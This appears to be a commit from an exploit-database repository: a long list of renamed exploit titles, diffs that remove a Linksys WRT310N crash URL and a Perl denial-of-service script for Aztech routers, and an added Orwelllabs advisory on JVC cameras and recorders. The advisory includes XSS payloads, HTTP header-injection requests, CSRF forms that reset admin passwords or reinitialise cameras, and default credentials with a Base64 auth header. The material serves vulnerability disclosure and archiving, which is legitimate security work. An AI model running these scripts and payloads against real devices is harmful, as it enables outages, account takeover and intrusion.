subscribers.tracking.edit.php subtrackingid Parameter SQL Injection QuickPayPro 3.1 - subscribers.tracking.edit.php subtrackingid Parameter SQL Injection QuickPayPro 3.1 tracking.details.php trackingid Parameter SQL Injection QuickPayPro 3.1 - tracking.details.php trackingid Parameter SQL Injection oracle application server discussion forum portlet Multiple Vulnerabilities oracle application server discussion forum portlet - Multiple Vulnerabilities Linux Kernel - 'MSR' Driver Local Privilege Escalation Linux Kernel (Redhat) (32bit/64bit) - 'MSR' Driver Local Privilege Escalation Linux Kernel 2.4.x/2.5.x/2.6.x - Ssockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities Linux Kernel 2.4.x/2.5.x/2.6.x - Sockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities Apache James 2.2 SMTP Denial of Service Vulnerability Apache James 2.2 - SMTP Denial of Service Vulnerability Linux Kernel - NFS and EXT3 Combination Remote Denial of Service Vulnerability Linux Kernel 2.6.x (<= 2.6.17.7) - NFS and EXT3 Combination Remote Denial of Service Vulnerability Microsoft windows xp/2000/2003 help Multiple Vulnerabilities Microsoft Windows XP/2000/2003 help - Multiple Vulnerabilities ArticleSetup Multiple Vulnerabilities ArticleSetup - Multiple Vulnerabilities PhotoStore details.php gid Parameter XSS PhotoStore view_photog.php photogid Parameter XSS PhotoStore details.php - gid Parameter XSS PhotoStore view_photog.php - photogid Parameter XSS MailEnable 2.x SMTP NTLM Authentication Multiple Vulnerabilities MailEnable 2.x - SMTP NTLM Authentication - Multiple Vulnerabilities BlooMooWeb 1.0.9 - ActiveX Control Multiple Vulnerabilities BlooMooWeb 1.0.9 - ActiveX Control - Multiple Vulnerabilities Simplog 0.9.3 BlogID Parameter Multiple SQL Injection Vulnerabilities Simplog 0.9.3 BlogID Parameter - Multiple SQL Injection Vulnerabilities Oracle January 2007 Security Update Multiple Vulnerabilities Oracle January 2007 Security Update - Multiple Vulnerabilities Linux Kernel 2.6.x - IPv6_SockGlue.c NULL Pointer Dereference Vulnerability Linux Kernel 2.6.x - IPv6_SockGlue.c NULL Pointer Dereference DoS Vulnerability E-Xoops 1.0.5/1.0.8 modules/arcade/index.php gid Parameter SQL Injection E-Xoops 1.0.5/1.0.8 modules/arcade/index.php gid Parameter - SQL Injection LANAI CMS 1.2.14 GALLERY Module gid Parameter SQL Injection LANAI CMS 1.2.14 GALLERY Module - gid Parameter SQL Injection OpenBase 10.0.x - Multiple Vulnerabilities (Buffer Overflow & Remote Command Execution) OpenBase 10.0.x - (Buffer Overflow & Remote Command Execution) Multiple Vulnerabilities ZyXEL P-330W Multiple Vulnerabilities ZyXEL P-330W - Multiple Vulnerabilities WinComLPD Total 3.0.2.623 - Multiple Vulnerabilities (Buffer Overflow and Authentication Bypass) WinComLPD Total 3.0.2.623 - (Buffer Overflow and Authentication Bypass) Multiple Vulnerabilities Zilab Chat and Instant Messaging (ZIM) 2.0/2.1 - Server Multiple Vulnerabilities Zilab Chat and Instant Messaging (ZIM) 2.0/2.1 Server - Multiple Vulnerabilities Linux Kernel 3.4 < 3.13.2 - Arbitrary write with CONFIG_X86_X32 Linux Kernel 3.4 < 3.13.2 - Local Root (CONFIG_X86_X32=y) Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - Arbitrary Write with CONFIG_X86_X32 Exploit Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - Local Root (CONFIG_X86_X32=y) IBM solidDB 6.0.10 - Multiple Vulnerabilities (Format String and Denial of Service) IBM solidDB 6.0.10 - (Format String and Denial of Service) Multiple Vulnerabilities Linux Kernel < 3.4.5 - Local Root Exploit (ARM - Android 4.2.2 / 4.4) Linux Kernel < 3.4.5 (ARM - Android 4.2.2 / 4.4) - Local Root Exploit Catia V5-6R2013 - _CATV5_AllApplications_ - Stack Buffer Overflow Catia V5-6R2013 - 'CATV5_AllApplications' - Stack Buffer Overflow Catia V5-6R2013 - _CATV5_Backbone_Bus_ - Stack Buffer Overflow Catia V5-6R2013 - 'CATV5_Backbone_Bus' - Stack Buffer Overflow Linux Kernel - utrace and ptrace Local Denial of Service Vulnerability (1) Linux Kernel - utrace and ptrace Local Denial of Service Vulnerability (2) Linux Kernel 2.6.9 <= 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service Vulnerability (1) Linux Kernel 2.6.9 <= 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service Vulnerability (2) EasyE-Cards 3.10 - Multiple Vulnerabilities (SQL Injection and Cross-Site Scripting) EasyE-Cards 3.10 - (SQL Injection and Cross-Site Scripting) Multiple Vulnerabilities Jamroom <= 3.3.8 - Multiple Vulnerabilities (Cookie Authentication Bypass and Unspecified Security Issues) Jamroom <= 3.3.8 - (Cookie Authentication Bypass and Unspecified Security Issues) Multiple Vulnerabilities LuxCal 3.2.2 - Multiple Vulnerabilities (CSRF/Blind SQL Injection) LuxCal 3.2.2 - (CSRF/Blind SQL Injection) Multiple Vulnerabilities Linux Kernel 2.6.x - Cloned Process 'CLONE_PARENT' Local Origin Validation Weakness PG Roommate Finder Solution quick_search.php part Parameter XSS PG Roommate Finder Solution viewprofile.php part Parameter XSS PG Roommate Finder Solution - quick_search.php part Parameter XSS PG Roommate Finder Solution - viewprofile.php part Parameter XSS Linux Kernel 2.6.31 - 'perf_counter_open()' Local Buffer Overflow Vulnerability e107 0.7.x - Multiple Vulnerabilities ('CAPTCHA' Security Bypass and Cross-Site Scripting) e107 0.7.x - ('CAPTCHA' Security Bypass and Cross-Site Scripting) Multiple Vulnerabilities IBM Rational RequisitePro 7.10 ReqWeb Help Feature ReqWebHelp/advanced/workingSet.jsp operation Parameter XSS IBM Rational RequisitePro 7.10 - ReqWeb Help Feature ReqWebHelp/advanced/workingSet.jsp operation Parameter XSS Linux Kernel 2.6.x - 'pipe.c' Local Privilege Escalation Vulnerability (1) Linux Kernel 2.6.x - pipe.c Local Privilege Escalation Vulnerability (2) Linux Kernel 2.6.x (2.6.0 <= 2.6.31) - 'pipe.c' Local Privilege Escalation Vulnerability (1) Linux Kernel 2.6.x - 'pipe.c' Local Privilege Escalation Vulnerability (2) Linux Kernel 3.3 < 3.8 - SOCK_DIAG Local Root Exploit Linux Kernel 3.3 < 3.8 (Ubuntu/Fedora 18) - SOCK_DIAG Local Root Exploit Linux kernel 3.14-rc1 <= 3.15-rc4 - Raw Mode PTY Local Echo Race Condition (x64) Local Privilege Escalation Linux Kernel 3.14-rc1 <= 3.15-rc4 - Raw Mode PTY Local Echo Race Condition (x64) Local Privilege Escalation Ubuntu 12.04.0-2LTS x64 - perf_swevent_init Kernel Local Root Exploit Linux Kernel <= 3.2.0-23 / <= 3.5.0-23 (Ubuntu 12.04.(0_1_2) x64) - perf_swevent_init Local Root Exploit Linux Kernel - 'find_keyring_by_name()' Local Memory Corruption Vulnerability Linux Kernel <= 2.6.34 - 'find_keyring_by_name()' Local Memory Corruption Vulnerability Linux Kernel - ptrace/sysret - Local Privilege Escalation Linux Kernel < 3.2.0-23 (Ubuntu 12.04) - ptrace/sysret Local Privilege Escalation Trend Micro InterScan Web Security Virtual Appliance Multiple Vulnerabilities Trend Micro InterScan Web Security Virtual Appliance - Multiple Vulnerabilities OpenLDAP 2.4.22 - 'modrdn' Request Multiple Vulnerabilities OpenLDAP 2.4.22 - ('modrdn' Request) Multiple Vulnerabilities ServletExec - Multiple Vulnerabilities (Directory Traversal and Authentication-Bypass) ServletExec - (Directory Traversal and Authentication-Bypass) Multiple Vulnerabilities Creative Contact Form - Arbitrary File Upload Creative Contact Form 0.9.7 - Arbitrary File Upload Aireplay-ng 1.2 beta3 - _tcp_test_ Length Parameter Stack Overflow Aireplay-ng 1.2 beta3 - 'tcp_test' Length Parameter Stack Overflow Windows OLE - Remote Code Execution _Sandworm_ Exploit (MS14-060) Windows OLE - Remote Code Execution 'Sandworm' Exploit (MS14-060) Drupal Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam Multiple Vulnerabilities Drupal Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Multiple Vulnerabilities CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities CBN CH6640E/CG6640E Wireless Gateway Series - Multiple Vulnerabilities Xerox Multifunction Printers (MFP) _Patch_ DLM Vulnerability Xerox Multifunction Printers (MFP) 'Patch' DLM Vulnerability Linux Kernel <= 2.6.39 (32-bit & 64-bit) - Mempodipper Local Root (2) Linux Kernel 2.6.39 <= 3.2.2 (32-bit & 64-bit) - Mempodipper Local Root (2) Newv SmartClient 1.1.0 - 'NewvCommon.ocx' ActiveX Control Multiple Vulnerabilities Newv SmartClient 1.1.0 - 'NewvCommon.ocx' ActiveX Control - Multiple Vulnerabilities Eclipse 3.3.2 IDE Help Server help/advanced/workingSetManager.jsp workingSet Parameter XSS Eclipse 3.3.2 IDE - Help Server help/advanced/workingSetManager.jsp workingSet Parameter XSS Linux Kernel - libfutex - Local Root for RHEL/CentOS 7.0.1406 Linux Kernel <= 3.14.5 (RHEL/CentOS 7) - libfutex Local Root RealNetworks GameHouse 'InstallerDlg.dll' 2.6.0.445 - ActiveX Control Multiple Vulnerabilities RealNetworks GameHouse 'InstallerDlg.dll' 2.6.0.445 ActiveX Control - Multiple Vulnerabilities OS X networkd _effective_audit_token_ XPC Type Confusion Sandbox Escape OS X networkd - 'effective_audit_token' XPC Type Confusion Sandbox Escape Linux Kernel 2.6.26 - Auerswald USB Device Driver Buffer Overflow Vulnerability Linux Kernel 2.6.26 - Auerswald USB Device Driver Buffer Overflow Proof of Concept AJ Classifieds 'listingid' Parameter SQL Injection Vulnerability AJ Classifieds 'listingid' Parameter - SQL Injection Vulnerability BlueSoft Social Networking CMS SQL Injection Vulnerability BlueSoft Social Networking CMS - SQL Injection Vulnerability Linux Kernel IRET Instruction #SS Fault Handling - Crash PoC Linux Kernel PPP-over-L2TP Socket Level Handling - Crash PoC Linux Kernel Associative Array Garbage Collection - Crash PoC Linux Kernel <= 3.17.5 - IRET Instruction #SS Fault Handling Crash PoC Linux Kernel <= 3.15.6 - PPP-over-L2TP Socket Level Handling Crash PoC Linux Kernel <= 3.16.3 - Associative Array Garbage Collection Crash PoC Linux Kernel - Network Namespace Remote Denial of Service Vulnerability Linux Kernel <= 2.6.35 - Network Namespace Remote Denial of Service Vulnerability Kayako SupportSuite 3.x Multiple Vulnerabilities Kayako SupportSuite 3.x - Multiple Vulnerabilities Linux Kernel splice() System Call - Local DoS Linux Kernel <= 3.13 / <= 3.14 (Ubuntu) - splice() System Call Local DoS Mac OS X - _Rootpipe_ Privilege Escalation Mac OS X - 'Rootpipe' Privilege Escalation Apport - Local Linux Root Apport 2.14.1 (Ubuntu 14.04.2) - Linux Local Root Exploit SixApart MovableType Storable Perl Code Execution SixApart MovableType - Storable Perl Code Execution WordPress TagGator 'tagid' Parameter SQL Injection Vulnerability WordPress TagGator 'tagid' Parameter - SQL Injection Vulnerability JSPMyAdmin 1.1 Multiple Vulnerabilities JSPMyAdmin 1.1 - Multiple Vulnerabilities WordPress NewStatPress Plugin 0.9.8 Multiple Vulnerabilities WordPress Landing Pages Plugin 1.8.4 Multiple Vulnerabilities WordPress NewStatPress Plugin 0.9.8 - Multiple Vulnerabilities WordPress Landing Pages Plugin 1.8.4 - Multiple Vulnerabilities ESC 8832 Data Controller Multiple Vulnerabilities ESC 8832 Data Controller - Multiple Vulnerabilities ZTE AC 3633R USB Modem Multiple Vulnerabilities ZTE AC 3633R USB Modem - Multiple Vulnerabilities OSSEC 2.7 <= 2.8.1 - _diff_ Command Local Root Escalation OSSEC 2.7 <= 2.8.1 - 'diff' Command Local Root Escalation Ubuntu 12.04_ 14.04_ 14.10_ 15.04 - overlayfs Local Root (Shell) Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - overlayfs Local Root (Shell) Ubuntu 12.04_ 14.04_ 14.10_ 15.04 - overlayfs Local Root (Shadow File) Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - overlayfs Local Root (Shadow File) OSSEC WUI 0.8 - Denial of Service Adobe Flash Use-After-Free in Drawing Methods _this_ Adobe Flash - Use-After-Free in Drawing Methods 'this' Kaspersky Antivirus _Yoda's Protector_ Unpacking Memory Corruption Kaspersky Antivirus - Yoda's Protector Unpacking Memory Corruption Kallithea 0.2.9 (came_from) HTTP Response Splitting Vulnerability Kallithea 0.2.9 - (came_from) HTTP Response Splitting Vulnerability Linux/MIPS Kernel NetUSB - Remote Code Execution Exploit Linux/MIPS Kernel 2.6.36 NetUSB - Remote Code Execution Exploit Linux Kernel <= 3.2.1 - Tracing Mutiple Local Denial of Service Vulnerabilities Cisco Linksys WRT310N Router Multiple Denial of Service Vulnerabilities Cisco Linksys WRT310N Router - Multiple Denial of Service Vulnerabilities WordPress WP Private Messages Plugin 'msgid' Parameter SQL Injection Vulnerability WordPress WP Private Messages Plugin - 'msgid' Parameter SQL Injection Vulnerability Microsoft Windows Media Center Library Parsing RCE Vulnerability aka _self-executing_ MCL File Microsoft Windows Media Center Library - Parsing RCE Vulnerability aka 'self-executing' MCL File MyBB 'misc.php' Remote Denial of Service Vulnerability MyBB 1.6.12 - 'misc.php' Remote Denial of Service Vulnerability WHMCS 'cart.php' Denial of Service Vulnerability phpBB <= 3.0.8 Remote Denial of Service Vulnerability WHMCS 5.12 - 'cart.php' Denial of Service Vulnerability phpBB <= 3.0.8 - Remote Denial of Service Vulnerability Ubuntu 14.04 LTS_ 15.10 - overlayfs Local Root Exploit Linux Kernel <=4.3.3 (Ubuntu 14.04_ 15.10) - overlayfs Local Root Exploit Linux Kernel overlayfs - Local Privilege Escalation Linux Kernel <= 4.3.3 overlayfs - Local Privilege Escalation Inductive Automation Ignition 7.8.1 Remote Leakage Of Shared Buffers Inductive Automation Ignition 7.8.1 - Remote Leakage Of Shared Buffers Linux Kernel - REFCOUNT Overflow/Use-After-Free in Keyrings Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Linux Kernel - prima WLAN Driver Heap Overflow Linux Kernel <= 3.x / <= 4.x - prima WLAN Driver Heap Overflow Multiple Aztech Routers '/cgi-bin/AZ_Retrain.cgi' Denial of Service Vulnerability Multiple Aztech Routers - '/cgi-bin/AZ_Retrain.cgi' Denial of Service Vulnerability WordPress Wordfence Security Plugin Multiple Vulnerabilities WordPress Wordfence Security Plugin - Multiple Vulnerabilities STIMS Buffer - Buffer Overflow SEH - DoS STIMS Cutter - Buffer Overflow DoS STIMS Buffer 1.1.20 - Buffer Overflow SEH (DoS) STIMS Cutter 1.1.3.20 - Buffer Overflow DoS Linux Kernel - digi_acceleport Nullpointer Dereference Linux Kernel - Wacom Multiple Nullpointer Dereferences Linux Kernel - visor (treo_attach) Nullpointer Dereference Linux Kernel - visor clie_5_attach Nullpointer Dereference Linux Kernel - cypress_m8 Nullpointer Dereference Linux Kernel - mct_u232 Nullpointer Dereference Linux Kernel - cdc_acm Nullpointer Dereference Linux Kernel - aiptek Nullpointer Dereference Linux Kernel <= 3.10.0 (CentOS / RHEL 7.1) - digi_acceleport Nullpointer Dereference Linux Kernel <= 3.10.0 (CentOS / RHEL 7.1) - Wacom Multiple Nullpointer Dereferences Linux Kernel <= 3.10.0 (CentOS / RHEL 7.1) - visor (treo_attach) Nullpointer Dereference Linux Kernel <= 3.10.0 (CentOS / RHEL 7.1) - visor clie_5_attach Nullpointer Dereference Linux Kernel <= 3.10.0 (CentOS / RHEL 7.1) - cypress_m8 Nullpointer Dereference Linux Kernel <= 3.10.0 (CentOS / RHEL 7.1) - mct_u232 Nullpointer Dereference Linux Kernel <= 3.10.0 (CentOS / RHEL 7.1) - cdc_acm Nullpointer Dereference Linux Kernel <= 3.10.0 (CentOS / RHEL 7.1) - aiptek Nullpointer Dereference RHEL 7.1 Kernel - snd-usb-audio Crash PoC RHEL 7.1 Kernel - iowarrior driver Crash PoC RHEL 7.1 (and CentOS) Kernel 3.10.0-229.x - snd-usb-audio Crash PoC RHEL 7.1 (and CentOS) Kernel 3.10.0-229.x - iowarrior driver Crash PoC LShell <= 0.9.15 - Remote Code Execution LShell <= 0.9.15 - Remote Code Execution Exim _perl_startup_ Privilege Escalation Exim - 'perl_startup' Privilege Escalation NetCommWireless HSPA 3G10WVE Wireless Router – Multiple Vulnerabilities NetCommWireless HSPA 3G10WVE Wireless Router - Multiple Vulnerabilities Linux Kernel 4.4.x (Ubuntu 16.04) - Use-After-Free via double-fdput() in bpf(BPF_PROG_LOAD) Error Path Local Root Exploit Linux Kernel 4.4.x (Ubuntu 16.04) - double-fdput() in bpf(BPF_PROG_LOAD) Local Root Exploit i.FTP 2.21 - Host Address / URL Field SEH Exploit All Windows Null-Free Shellcode - Functional Keylogger to File - 601 (0x0259) bytes MediaInfo 0.7.61 - Crash PoC Ipswitch WS_FTP LE 12.3 - Search field SEH Overwrite POC Core FTP Server 32-bit Build 587 - Heap Overflow Multiple JVC HDRs and Net Cameras - Multiple Vulnerabilities Adobe Reader DC 15.010.20060 - Memory Corruption Nfdump Nfcapd 1.6.14 - Multiple Vulnerabilities
2016-05-11 05:03:54 +00:00 · 2016-05-11 05:03:54 +00:00 · 52e862d62a
commit 52e862d62a
parent 01664c67b8
56 changed files with 2415 additions and 2349 deletions
--- a/files.csv
+++ b/files.csv
--- a/platforms/hardware/remote/38493.txt
+++ b/platforms/hardware/remote/38493.txt
@ -1,7 +0,0 @@
-source: http://www.securityfocus.com/bid/59445/info
-
-The Cisco Linksys WRT310N Router is prone to multiple denial-of-service vulnerabilities when handling specially crafted HTTP requests.
-
-Successful exploits will cause the device to crash, denying service to legitimate users. 
-
-http://www.example.com/apply.cgi?pptp_dhcp=0&submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&dhcp_check=&lan_netmask_0=&lan_netmask_1=&lan_netmask_2=&lan_netmask_3=&timer_interval=30&language=EN&wan_proto=dhcp&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&url_address=my.wrt310n&lan_proto=dhcp&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=AAAAAAAAAAAAAAAAAAA&time_zone=-08+1+1&_daylight_time=1 
--- a/platforms/hardware/remote/39315.pl
+++ b/platforms/hardware/remote/39315.pl
@ -1,42 +0,0 @@
-source: http://www.securityfocus.com/bid/69809/info
-
-Multiple Aztech routers are prone to a denial-of-service vulnerability.
-
-Attackers may exploit this issue to cause an affected device to crash, resulting in a denial-of-service condition.
-
-Aztech DSL5018EN, DSL705E and DSL705EU are vulnerable. 
-
-#!/usr/bin/perl
-use strict;
-use IO::Socket;
-
-if(!defined($ARGV[0])) {
-system ('clear');
-print "---------------------------------------------\n";
-print "++ Aztech Modem Denial of Service Attack\n";
-print "++ Usage: perl $0 TARGET:PORT\n";
-print "++ Ex: perl $0 192.168.254.254:80\n\n";
-exit;
-}
-
-my $TARGET = $ARGV[0];
-my ($HOST, $PORT)= split(':',$TARGET);
-my $PATH = "%2f%63%67%69%2d%62%69%6e%2f%41%5a%5f%52%65%74%72%61%69%6e%2e%63%67%69";
-
-system ('clear');
-print "---------------------------------------------\n";
-print "++ Resetting WAN modem $TARGET\n";
-
-my $POST = "GET $PATH HTTP/1.1";
-my $ACCEPT = "Accept: text/html";
-
-my $sock = new IO::Socket::INET ( PeerAddr => "$HOST",PeerPort => "$PORT",Proto => "tcp"); die "[-] Can't creat socket: $!\n" unless $sock;
-
-print $sock "$POST\n";
-print $sock "$ACCEPT\n\n";
-print "++ Sent. The modem should be disconnected by now.\n";
-$sock->close();
-
-exit;
-
-
--- a/platforms/hardware/webapps/39798.txt
+++ b/platforms/hardware/webapps/39798.txt
@ -0,0 +1,335 @@
+                      | | |       |
+  _ \  _|\ \  \ / -_) | | |  _` |  _ \(_-<
+\___/_|   \_/\_/\___|_|_|_|\__,_|_.__/___/
+
+www.orwelllabs.com
+security advisory
+      olsa-2016-04-01
+
+
+
+
+* Adivisory Information
+++++++++++++++++++++++
+(+) Title: JVC Multiple Products Multiple Vulnerabilities
+(+) Vendor: JVC Professional Video
+(+) Research and Advisory: Orwelllabs
+(+) Adivisory URL:
+http://www.orwelllabs.com/2016/04/jvc-multiple-products-multiple.html
+(+) OLSA-ID: OLSA-2016-04-01
+(+) Affected Products: JVC HDR VR-809/816, Network cameras VN-C*, VN-V*,
+VN-X* with firmwares 1.03 and 2.03
+(+) IoT Attack Surface: Device Administrative Interface
+(+) Owasp IoTTop10: I1, I2
+
+
+
+* Overview
++++++++++
+I1 - 1. Multiple Cross-site Scripting
+I1 - 2. HTTP Header Injection
+I1 - 3. Multiple Cross-site Request Forgery
+I1 - 4. Cleartext sensitive data
+I1 - 5. Weak Default Credentials/Known credentials
+I2 - 6. Poorly Protected Credentials
+
+
+
+1. Reflected Cross-site scripting
+=================================
+JVC Hard Disk Recorders are prone to XSS and HTTP Header Injection[2].
+
+(+) Affected Products:
+----------------------
+JVC VR-809 HDR
+JVC VR-816 HDR
+
+
+(+) Technical Details/PoCs
+--------------------------
+
+(+) URL Trigger:
+http://xxx.xxx.xxx.xxx/api/param?video.input(01).comment&video.input(02).comment&video.input(03).comment&video.input(04).comment&video.input(05).comment&video.input(06).comment&video.input(07).comment&video.input(08).comment&video.input(09).comment
+
+(+) Payload used [ *** XSS *** ]: <img src=a onerror=alert("0rwelll4bs")>
+(+) affected script/path: /api/param?
+(+) affected parameters (video.input.COMMENT):
+
+ video.input(01).comment[ *** XSS *** ]
+ video.input(02).comment[ *** XSS *** ]
+ video.input(03).comment[ *** XSS *** ]
+ video.input(04).comment[ *** XSS *** ]
+ video.input(05).comment[ *** XSS *** ]
+ video.input(06).comment[ *** XSS *** ]
+ video.input(07).comment[ *** XSS *** ]
+ video.input(08).comment[ *** XSS *** ]
+ video.input(09).comment[ *** XSS *** ]
+
+(+) affected parameters (video.input.STATUS):
+
+ video.input(01).status[ *** XSS *** ]
+ video.input(02).status[ *** XSS *** ]
+ video.input(03).status[ *** XSS *** ]
+ video.input(04).status[ *** XSS *** ]
+ video.input(05).status[ *** XSS *** ]
+ video.input(06).status[ *** XSS *** ]
+ video.input(07).status[ *** XSS *** ]
+ video.input(08).status[ *** XSS *** ]
+ video.input(09).status[ *** XSS *** ]
+
+
+(+) URL Trigger:
+http://xxx.xxx.xxx.xxx/api/param?network.interface(01).dhcp.status[ *** XSS
+***]
+(+) affected parameters:
+ interface(01).dhcp.status[ *** XSS *** ]
+
+* In fact the javascript can be triggered just requesting the '/api/param?'
+directly with payload, like this:
+
+(+) URL: http://xxx.xxx.xxx.xxx/api/param?[*** XSS *** ]
+
+
+2. HTTP Header Injection
+========================
+The value of the "video.input(X).comment/status" request parameter is
+copied into the 'X-Response' response header.
+So the malicious payload submitted in the parameter generates a response
+with an injected HTTP header.
+
+
+> If you request the following URL with an Javascript Payload "[*** XSS
+***]":
+
+http://xxx.xxx.xxx.xxx/api/param?video.input(01).comment<img src=a
+onerror=alert("XSS")>&video.input(02).comment&video.input(03).comment&video.input(04).comment&video.input(05).comment&video.input(06).comment&video.input(07).comment&video.input(08).comment&video.input(09).comment
+
+> It will gennerate the GET request bellow:
+
+GET /api/param?video.input(01).comment<img src=a
+onerror=alert("XSS")>&video.input(02).comment&video.input(03).comment&video.input(04).comment&video.input(05).comment&video.input(06).comment&video.input(07).comment&video.input(08).comment&video.input(09).comment
+HTTP/1.1
+Host: xxx.xxx.xxx.xxx
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101
+Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://xxx.xxx.xxx.xxx/
+Cookie: vrtypename=Hard%20Disk%20Recorder; vrmodelname=0rw3|||4bs
+Authorization: Basic YWRtaW46anZj
+Connection: keep-alive
+
+> And we'll get the response from the server:
+
+HTTP/1.1 200 OK
+Connection: close
+Content-Type: text/html; charset=utf-8
+Content-Length: 564
+X-Response: video.input(01).comment<img src=a
+onerror=alert("XSS")>&video.input(02).comment&video.input(03).comment&video.input(04).comment&video.input(05).comment&video.input(06).comment&video.input(07).comment&video.input(08).comment&video.input(09).comment
+Cache-control: no-cache
+Pragma: no-cache
+Expires: Thu, 05 May 2016 14:20:45 GMT
+Server: JVC VR-809/816 API Server/1.0.0
+Date: Thu, 05 May 2016 14:20:45 GMT
+
+The javascript payload will be inject in X-Response response Header field
+
+
+3. Multiple Cross-site Request Forgery
+======================================
+Multiple products from JVC are prone to CSRF.
+
+(+) Affected Products:
+----------------------
+The following products with firmware versions 1.03, 2.03 and early:
+
+VN-C2WU
+VN-C3U
+VN-C1U
+VN-C2U
+VN-C3WU
+VN-A1U
+VN-C10U
+VN-C11U
+VN-C655U
+VN-C625U
+VN-C205U
+VN-C215V4U
+VN-C215VP4U
+VN-V686U
+VN-V686WPU
+VN-V25U
+VN-V26U
+VN-X35U
+VN-V685U
+VN-V686WPBU
+VN-X235VPU
+VN-V225VPU
+VN-X235U
+VN-V225U
+VN-V17U
+VN-V217U
+VN-V217VPU
+VN-H157WPU
+VN-T16U
+VN-T216VPRU
+
+
+(+) Technical Details/PoCs
+--------------------------
+
+> CSRF: to change 'admin' password to 'sm!thW'
+
+<html>
+ <!-- Orwelllabs - JVC NetCams CSRF PoC -->
+  <body>
+    <form action="http://xxx.xxx.xxx.xxx/cgi-bin/c20setup.cgi"
+method="POST">
+      <input type="hidden" name="c20loadhtml"
+value="c20systempassword&#46;html" />
+      <input type="hidden" name="usermode" value="admin" />
+      <input type="hidden" name="newpassword" value="sm!thW" />
+      <input type="hidden" name="new2password" value="sm!thW" />
+      <input type="hidden" name="ok" value="OK" />
+      <input type="submit" value="Submit form" />
+    </form>
+  </body>
+</html>
+
+
+> CSRF: to set 'user' password to "w!nst0nSm!th"
+
+<html>
+ <!-- Orwelllabs - JVC NetCams CSRF PoC -->
+  <body>
+    <form action="http://xxx.xxx.xxx.xxx/cgi-bin/c20setup.cgi"
+method="POST">
+      <input type="hidden" name="c20loadhtml"
+value="c20systempassword&#46;html" />
+      <input type="hidden" name="usermode" value="user" />
+      <input type="hidden" name="newpassword" value="w!nst0nSm!th" />
+      <input type="hidden" name="new2password" value="w!nst0nSm!th" />
+      <input type="hidden" name="ok" value="OK" />
+      <input type="submit" value="Submit form" />
+    </form>
+  </body>
+</html>
+
+
+> CSRF: to reinitialize the cam
+
+<html>
+  <!-- Orwelllabs - JVC NetCams CSRF PoC -->
+  <body>
+    <form action="http://xxx.xxx.xxx.xxx/cgi-bin/c20setup.cgi"
+method="POST">
+      <input type="hidden" name="c20loadhtml"
+value="c20systemmainte&#46;html" />
+      <input type="hidden" name="init" value="Initialize" />
+      <input type="submit" value="Submit form" />
+    </form>
+  </body>
+</html>
+
+
+4. Cleartext sensitive data
+===========================
+By default everything is trasmite over HTTP, including credentials.
+
+
+5. Weak Default Credentials/Known credentials
+=============================================
+The vast maiority of these devices remain with default credential admin:jvc
+or admin:[model-of-camera] and costumers are not obligated to change it
+during initial setup.
+
+
+6. Poorly Protected Credentials
+===============================
+An attacker in the same network is able to capture and decode the
+credentials as they aren't trasmited over HTTPs and are protected using
+just
+Base64 with Basic Authorization.
+
+> Authentication process
+
+GET /cgi-bin/x35viewing.cgi?x35ptzviewer.html HTTP/1.1
+Host: xxx.xxx.xxx.xxx
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101
+Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: X35JPEGVIEWSIZE=VGA; X35JPEGDISP=OFF-OFF-OFF-OFF-1;
+X35JPEGSTREAM=HTTP-5-225.0.1.1-49152; X35JPEGHTTPPORT=80;
+X35FOLDERNAME=VN-X35; X35MPEG4VIEWSIZE=VGA; X35MPEG4DISP=OFF-OFF-OFF-1;
+X35MPEG4STREAM=HTTP-225.0.2.1-59152; X35MPEG4HTTPPORT=80;
+X35AUDIO=OFF-HTTP-225.0.3.1-39152-49298-80; X35PTZCTRL=w!nst0nSm!th
+Connection: keep-alive
+Authorization: Basic YWRtaW46anZj
+
+
+*Once this is related with a old bad design is possible that a large range
+of products are affected by reported issues.
+
+
+Timeline
++++++++
+2016-04-20: First attemp to contact Vendor
+2016-04-22: Vendor asks for products affected/details sent
+2016-04-26: Ask vendor for any news about the issues reported
+2016-05-09: Until this date no response
+2016-05-10: Full disclosure
+
+
+Legal Notices
+++++++++++++
+The information contained within this advisory and in any other published
+by our lab is supplied "as-is" with no warranties or guarantees of fitness
+of use or otherwise.
+I accept no responsibility for any damage caused by the use or misuse of
+this information.
+
+
+About Orwelllabs
++++++++++++++++
+Orwelllabs is an independent security research lab interested in IoT, what
+means embedded devices and all its components like web applications,
+network, mobile applications and all surface areas prone to attack.
+Orwelllabs aims to study, learn and produce some intelligence around this
+vast and confusing big picture called smart cities. We have special
+appreciation for devices designed to provide security to these highly
